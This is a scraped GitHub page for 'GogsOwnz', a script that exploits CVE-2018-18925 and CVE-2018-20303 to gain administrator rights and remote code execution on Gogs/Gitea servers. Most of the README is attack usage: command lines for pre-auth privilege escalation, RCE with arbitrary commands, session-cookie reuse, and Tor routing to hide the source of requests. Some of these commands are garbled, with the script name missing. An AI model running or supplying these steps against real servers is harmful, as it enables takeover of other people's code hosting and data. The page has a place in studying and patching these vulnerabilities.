Skip to content
Gogs CVEs
Python Go
Branch: master
Clone or download
TheZ3ro Merge pull request #2 from pollev/patch-1
Properly preserve session ID length
Latest commit b634b5f Jul 29, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
gogsownz.pdf release Mar 25, 2019 Properly presever session ID length Jul 4, 2019
payload release Mar 25, 2019 release Mar 25, 2019
sess.go release Mar 25, 2019


GogsOwnz is a simple script to gain administrator rights and RCE on a Gogs/Gitea server.
Exploit vulnerabilities in Gogs/Gitea, including CVE-2018-18925, CVE-2018-20303.

Legal Disclaimer This script is offered as is. No warranty, use on your own, please obey the law.

Typical Usage - [Please, read the full usage]

Get info about Gogs/Gitea running

python3 -v --info

Exploit preauth PrivEsc

python3 -v --preauth

Exploit PrivEsc

python3 -v -C '<user>:<password>' --cleanup

or alternatively

python3 -v -c '<i_like_gogs_cookie>' --cleanup

Exploit preauth RCE

python3 -v --preauth --rce 'sleep 10' --cleanup

Exploit auth RCE

python3 -v -C '<user>:<password>' --rce 'sleep 10' --cleanup

Full usage

usage: gogsownz [-h] [-C CREDS] [-n COOKIENAME] [-c COOKIE] [-i] [--rce RCE]
                [--repo REPO] [--preauth] [--windows] [--cleanup] [--tor]
                [--check-tor] [--burp] [-k] [--verbose]

positional arguments:
  url                   URL for the Gogs server

optional arguments:
  -h, --help            show this help message and exit
  -C CREDS, --creds CREDS
                        Credentials for the Gogs server, in the from
  -n COOKIENAME, --cookie-name COOKIENAME
                        Name of the Gogs-specific session cookie
  -c COOKIE, --cookie COOKIE
                        Session for the Gogs server, the value in the
                        i_like_gogits Cookie
  -i, --info            Only detect informations about the running Gogs
                        server, then quit
  --rce RCE             Command to execute on the Gogs server
  --repo REPO           Use an existing repo for the PrivEsc
  --preauth             Try the pre-auth vulnerability
  --windows             Gogs server runs on Windows
  --cleanup             Remove all created repo after exploit
  --tor                 Use tor proxy when performing requests
  --check-tor           Check that Tor is correctly set up before running
  --burp                Use burp proxy when performing requests
  -k, --insecure        Allow insecure server connections when using SSL
  --verbose, -v


Thanks to:

  • Tencent Security (@md5_salt, @ma7h1as and @chromium1337)
  • PentesterLab (@snyff)
  • LuckyC4t
  • the gogs security community :D

Further readings

You can’t perform that action at this time.